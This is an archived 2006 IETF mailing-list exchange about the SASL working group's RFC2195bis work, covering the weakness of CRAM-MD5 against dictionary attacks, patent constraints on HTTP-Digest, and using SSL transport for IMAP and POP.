From: Christian Huitema
[mailto:huitema(_at_)windows(_dot_)microsoft(_dot_)com]
From: Kurt D. Zeilenga [mailto:Kurt(_at_)OpenLDAP(_dot_)org] At 04:07 PM
9/7/2006, John C Klensin wrote:
I think we have a small misunderstanding here. Let me say more
clearly and briefly
My message was intended to clarify why the SASL WG is pursuing an
Informational recommendation for its RFC2195bis work and to
redirect
any comments specific to this work to the WG's list.
Well, if I remember correctly, there was ample discussion of
this topic during the IETF meeting in Paris -- both Steve
Bellovin and I presented the issues with such techniques.
Basic challenge response mechanisms like CRAM-MD5 are simply
too weak to be used on the Internet. They are subject to
dictionary attacks, which can retrieve the password in a very
short time. They don't deserve much more than documentation
for historical purpose.
HTTP-Digest was designed under the constraint that it had to be patent royalty
free. At the time every form of public key cryptography including Diffie
Hellman was under patent.
They are only useful if you have a strong password.
Unfortunately the mechanisms for password exchange that are not subject to
dictionary attacks are generally considered to be encumbered as well.
The solution to this particular problem is to use SSL as the transport. IMAP
and POP both support this use. It is a trivial matter to discover that IMAPS is
supported using an SRV record.
If the will is there this is all fixable.
Phill
_______________________________________________
Ietf mailing list
Ietf(_at_)ietf(_dot_)org
https://www1.ietf.org/mailman/listinfo/ietf